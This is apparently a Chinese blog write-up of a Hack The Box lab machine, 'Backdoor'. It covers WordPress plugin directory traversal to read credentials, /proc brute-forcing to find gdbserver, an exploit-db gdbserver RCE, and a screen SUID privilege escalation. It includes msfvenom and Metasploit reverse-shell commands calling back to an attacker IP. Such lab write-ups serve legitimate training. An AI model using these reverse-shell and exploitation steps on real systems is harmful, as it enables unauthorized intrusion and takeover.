网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

admin 2022年1月28日02:37:45SecIN安全技术社区网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)已关闭评论152 views1612字阅读5分22秒阅读模式

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

环境搭建:

靶机:Htb-Backdoor靶机

攻击机kali 2021

通过访问https://app.hackthebox.com/machines官网,先下载虚拟专用软件

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

将其导入攻击机kali,进行连接vpn

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

信息收集

渗透第一步,肯定少不了信息收集啦

nmap -n -sV -A -p- IP 初步探索信息,发现开放了22、80端口

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)
利用whatweb探测网站指纹识别软件

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

发现存在wordpress服务,版本号为5.8.1,尝试从这里进行渗透

利用dirsearch脚本扫描网站目录

python3 dirsearch.py -u http://10.10.11.125 扫描目录,得到一些目录信息,可进行访问

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

利用poc(wordpress)

思路一:

通过whatweb搜集结果,发现wordpress版本号,通过kali搜索可利用poc

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

下载poc查看,猜测可能存在文件创越漏洞

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

在访问浏览器中,发现存在目录穿越漏洞,不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

查看readme.txt,峰回路转,来了一点思路,尝试利用Ebook漏洞

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

利用此poc进行尝试目录下载

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

查看wp-config.php文件内容,发现用户和密码,猜测可能是登录密码

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

继续上一步内容, 浏览器进行访问wordpress登录后台,利用用户密码尝试登录,登录失败

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

但现实没有想象那么美好,也没想象那么糟糕,wordpress登录框密码错误,尝试admin也未果,绞劲脑汁寻找新思路咯~

寻找新思路(LFI插件)

使用Wordpres插件的LFI(本地文件包含)来进行端口读取

原理如下:https://tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html

上burp抓包,修改包含的参数pid,尝试从500-1000进行爆破

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

像这样读取/proc/pid/cmdline文件就可以了,其中pid是可变数字,根据测试数字进行猜测,等一段时间过后,发现奇怪程序gobserver,经查阅发现是监听程序,真是功夫不负有心人,继续往下干

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

漏洞利用

思路一:

利用exploit

继续渗透,发现需要利用到gdbserver rce的exploit

exploit如下:https://www.exploit-db.com/exploits/50539

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

msfvenom生成linux反弹木马

利用上一步的gobserver脚本进一步利用,生成linux反弹shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=666 PrependFork=true -o linux.bin

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

利用脚本+反弹bin成功getshell

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

利用python3 -c "import pty;pty.spawn('/bin/bash')" 得到交互shell

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

screen提权

查看可用suid提权
find / -perm -u=s 2>/dev/null 发现熟悉的screen提权

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

screen提权语句

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

成功提权,拿到最终flag

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

思路二:

模块getshell

exploit/multi/gdb/gdb_server_exec 模块

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

设置参数如下:
set target 1
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 10.10.11.125
set rport 1337
set lhost 本地ip
exploit 成功利用

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

下面同样可通过screen提权,舒服了,终于拿到flag了,成功交到Hack the box(舒服)

网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb)

总结:第一次发布这种hack the box博客,渗透过程中犯了挺多错误的,先是IP未通,后又爆破未果、getshell失败,还是太菜了,很多点整了挺久,终于拿到flag了。如若有差错,望大佬们提出见解,thank!

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月28日02:37:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  网络安全从0到0.5之Backdoor靶机实战渗透测试(Htb) http://cn-sec.com/archives/757910.html